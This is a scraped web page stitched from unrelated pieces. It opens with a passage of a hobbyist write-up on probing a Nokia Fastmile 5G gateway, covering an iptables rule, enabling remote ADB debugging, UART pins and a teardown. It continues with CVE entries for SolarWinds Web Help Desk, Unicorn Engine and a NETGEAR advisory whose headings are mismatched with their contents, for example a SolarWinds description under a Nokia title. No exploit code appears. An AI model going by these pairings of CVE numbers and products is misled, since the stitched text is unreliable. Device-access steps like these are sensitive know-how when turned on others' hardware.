![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-21-08-24-13.png)

The First Hop Is My pfsense Firewall (I'm Running Double NAT)

This can also be verified by performing a tcpdump with a filter on the Fastmile whilst pinging 9.9.9.9.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-21-08-23-56.png)

Why is our IP address 192.168.85.6??

I immediately copied over a precompiled binary of busybox onto the Fastmile to try to run ARP.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-21-08-28-12.png)

Then the realisation came.

**It's Two Devices in One Box!**

Nokia have basically taped a 5G capable phone to one of their old Alcatel-Lucent routers and shipped it in a cylindrical box. This also explains why the configuration modification tool earlier worked flawlessly.

![](https://eddiez.me/content/images/2021/11/Nokia-Fastmile.jpg)

Having root on the Android side doesn't help at all with getting root on the router side!

Using this knowledge we can also enable remote Android debugging by first adding a firewall rule.

    iptables -I INPUT 1 -s 192.168.85.6 -j ACCEPT

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-13-22-38-34.png)

Enabling remote debugging on a port.

    adb tcpip 5555 //While connected via USB.
    

Then connecting remotely without having to be tethered to the device.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-13-22-43-12.png)

Looking back at the physical device again you can even see two different PCB types.

![](https://eddiez.me/content/images/2021/11/4032-3026-resize-annotated-2.jpg)

UART pins are also provided for the router side that are easily accessible. These pins are 3.3v logic level and the pins from inside out are ground, RX, TX with a baud rate of 115200.

![](https://eddiez.me/content/images/2021/11/4032-3027-resize.jpg)

Letting it boot whilst connected via UART drops us into the same restricted shell that we had earlier via SSH where we don't know the 'shell' password. Not helpful.

Interrupting boot drops us in CFE but I don't have the patience to dump the image over serial as that would take ~4 days. Otherwise, I'm not too familiar with CFE and am not super keen on turning my Fastmile into a $400 brick.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-14-00-39-45.png)

Changing the GPON Password Board Parameter Doesn't Do Anything

If anyone else has any advice/knowledge feel free to ping me at email, we still aren't root after all this.

**Teardown**

Out of curiosity, I took the device apart a bit more as I hadn't seen any other write-ups detailing this.

Tracing back to the step where we'd removed the bottom of the device, the next step of disassembly is to bend back the clips around the perimeter circled in red. I've also circled the UART pins in yellow for clarity.

![](https://eddiez.me/content/images/2021/11/clips_resize.jpg)

Now you can flip the device and lift up the white shell to reveal the antennas.

![](https://eddiez.me/content/images/2021/11/antenna-resized.jpg)

Every bolt from here on is a Torx T8H. Looking at the top there are 5 bolts to undo which loosen the LED indicator board.

![](https://eddiez.me/content/images/2021/11/top-resized.jpg)

With the top LED indicator board off we can see where all the antenna's terminate. If you wanted to attach an external antenna, this is where you'd do it.

![](https://eddiez.me/content/images/2021/11/antenna-resized-1.jpg)

Unfortunately, accessibility to the connectors is very limited as some snake under the heatsink. I did try removing the heatsink later but it was pretty solidly bound to the PCB so I'm not sure if it's held together with a thermal epoxy or if I missed some bolts.

Next up, looking at the side of the device with the smaller heatsink (Android side), there are two more bolts on the diagonal face to loosen.

![](https://eddiez.me/content/images/2021/11/phone-side-resized.jpg)

This allows you to lift up 2/5 sides of the antenna assembly revealing the Android device.

![](https://eddiez.me/content/images/2021/11/phone-resized.jpg)

Removing the 4 bolts that hold the Android side in allows you to lift and fold the device over like we've done with the antenna panels.

![](https://eddiez.me/content/images/2021/11/phone-flipped-resized.jpg)

This also reveals the backside of the Alcatel-Lucent router and the only electrical interconnect between the two devices in the bottom right.

![](https://eddiez.me/content/images/2021/11/router-backside-resized-3.jpg)

I didn't go any further as the router side is mostly covered up by it's heatsink and if it's anything like the Android side then it was likely to also be difficult to remove.

CVE-2021-45896: WIP: Hacking the Nokia Fastmile

Hard coded credentials discovered in SolarWinds Web Help Desk product. Through these credentials, the attacker with local access to the Web Help Desk host machine allows to execute arbitrary HQL queries against the database and leverage the vulnerability to steal the password hashes of the users or insert arbitrary data into the database.

Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2021-35232: Success Center

An issue was discovered in split_region in uc.c in Unicorn Engine before 2.0.0-rc5. It allows local attackers to escape the sandbox. An attacker must first obtain the ability to execute crafted code in the target sandbox in order to exploit this vulnerability. The specific flaw exists within the virtual memory manager. The issue results from the faulty comparison of GVA and GPA while calling uc_mem_map_ptr to free part of a claimed memory block. An attacker can leverage this vulnerability to escape the sandbox and execute arbitrary code on the host machine.

\[Vulnerability Type Other\]

CWE-697: Incorrect Comparison

\[Vendor of Product\]

unicorn-engine

\[Affected Product Code Base\]

unicorn engine - <=2.0.0

\[Affected Component\]

uc.c, split\_region

\[Attack Type\]

Local

\[Impact Code execution\]

true

\[Attack Vectors\]

run specially crafted code withing unicorn with uc\_mem\_map\_ptr() and uc\_mem\_unmap() supported

\[Description\]

An issue was discovered in split\_region in uc.c in Unicorn Engine through 1.0.3 and 2.x through 2.0.0-rc4.

It allows local attackers to escape the sandbox.

An attacker must first

obtain the ability to execute crafted code in the target

sandbox in order to exploit this vulnerability. The specific flaw

exists within the virtual memory manager. The issue results from the

faulty comparison of GVA and GPA while calling uc\_mem\_map\_ptr to free

part of a claimed memory block. An attacker can leverage this

vulnerability to escape the sandbox and execute arbitrary code on the host

machine.

\[Discoverer\]

jwang@Balsn

\[Reference\]

Fix Patch : https://github.com/unicorn-engine/unicorn/commit/c733bbada356b0373fa8aa72c044574bb855fd24#diff-f978cc716461a0e6511a9a54b7931a714240e15fdc97ca002f75d36bda3af915

Detailed Analysis : https://github.com/jwang-a/CTF/blob/master/MyChallenges/Pwn/Unicorns\_Aisle/UnicornsAisle.pdf

CVE-2021-44078: CVE-2021-4407 reference

Certain NETGEAR devices are affected by privilege escalation. This affects R6900P before 1.3.3.140, R7000 before 1.0.11.126, R7000P before 1.3.3.140, and RS400 before 1.5.1.80.

Was this article helpful?   Yes     No

Associated CVE IDs: None 

First published: 2021-12-22

NETGEAR has released fixes for a vertical privilege escalation security vulnerability on the following product models:

*   R6900P, running firmware versions prior to 1.3.3.140
*   R7000, running firmware versions prior to 1.0.11.126
*   R7000P, running firmware versions prior to 1.3.3.140
*   RS400, running firmware versions prior to 1.5.1.80

NETGEAR strongly recommends that you download the latest firmware as soon as possible.

**To download the latest firmware for your NETGEAR product:**

1.  Visit NETGEAR Support.
2.  Start typing your model number in the search box, then select your model from the drop-down menu as soon as it appears.  
     If you do not see a drop-down menu, make sure that you entered your model number correctly, or select a product category to browse for your product model.
3.  Click **Downloads**.
4.  Under **Current Versions**, select the download whose title begins with **Firmware Version**. 
5.  Click **Download**.
6.  Follow the instructions in your product’s user manual, firmware release notes, or product support page to install the new firmware.

**Disclaimer**

This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information in the document or materials linked from the document is at your own risk. NETGEAR reserves the right to change or update this document at any time. NETGEAR expects to update this document as new information becomes available.

The vertical privilege escalation vulnerability remains if you do not complete all recommended steps. NETGEAR is not responsible for any consequences that could have been avoided by following the recommendations in this notification.

**Acknowledgements**

lm0963

**Common Vulnerability Scoring System**

CVSS Rating: High

CVSS Score: 8.4

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**Best Practices for Updating Firmware**

We recommend that you keep your NETGEAR devices up to date with the latest firmware. Firmware updates contain security fixes, bug fixes, and new features for your NETGEAR products. 

If your product is supported by one of our apps, using the app is the easiest way to update your firmware:

*   Orbi products: NETGEAR Orbi app
*   NETGEAR WiFi routers: NETGEAR Nighthawk app
*   Some NETGEAR Business products: NETGEAR Insight app (firmware updates through the app are available only for Insight subscribers)

If your product is not supported by one of our apps, you can always update your firmware manually by following the instructions in your product’s user manual, firmware release notes, or product support page. For more information, see Where can I find information about my NETGEAR product?.

**Contact**

We appreciate and value having security concerns brought to our attention. NETGEAR constantly monitors for both known and unknown threats. Being pro-active rather than re-active to emerging security issues is fundamental for product support at NETGEAR.

It is NETGEAR's mission to be the innovative leader in connecting the world to the internet. To achieve this mission, we strive to earn and maintain the trust of those that use NETGEAR products for their connectivity.

To report a security vulnerability, visit http://www.netgear.com/about/security/. 

If you are a NETGEAR customer with a security-related support concern, you can contact NETGEAR customer support at techsupport.security@netgear.com. 

**Revision History**

2021-12-22: Published advisory

Last Updated:12/23/2021 | Article ID: 000064528

**Was this article helpful?**Yes No

**This article applies to:**

*   Wireless AC Router Nighthawk (4)
    *   R6900P
    *   R7000
    *   R7000P
    *   RS400

How to Find Your Model Number

**Looking for more about your product?**

Get information, documentation, videos and more for your specific product.

**Need to Contact Support?**

With NETGEAR’s round-the-clock premium support, help is just a phone call away.

**Complimentary Support**

NETGEAR provides complimentary technical support for NETGEAR products for 90 days from the original date of purchase.

Contact Support

**NETGEAR Premium Support**

**GearHead Support for Home Users**

GearHead Support is a technical support service for NETGEAR devices and all other connected devices in your home. Advanced remote support tools are used to fix issues on any of your devices. The service includes support for the following:

*   Desktop and Notebook PCs, Wired and Wireless Routers, Modems, Printers, Scanners, Fax Machines, USB devices and Sound Cards
*   Windows Operating Systems (2000, XP or Vista), MS Word, Excel, PowerPoint, Outlook and Adobe Acrobat
*   Anti-virus and Anti-Spyware: McAfee, Norton, AVG, eTrust and BitDefender

Learn More

**ProSUPPORT Services for Business Users**

NETGEAR ProSUPPORT services are available to supplement your technical support and warranty entitlements. NETGEAR offers a variety of ProSUPPORT services that allow you to access NETGEAR's expertise in a way that best meets your needs:

*   Product Installation
*   Professional Wireless Site Survey
*   Defective Drive Retention (DDR) Service

Learn More

Tag

#mac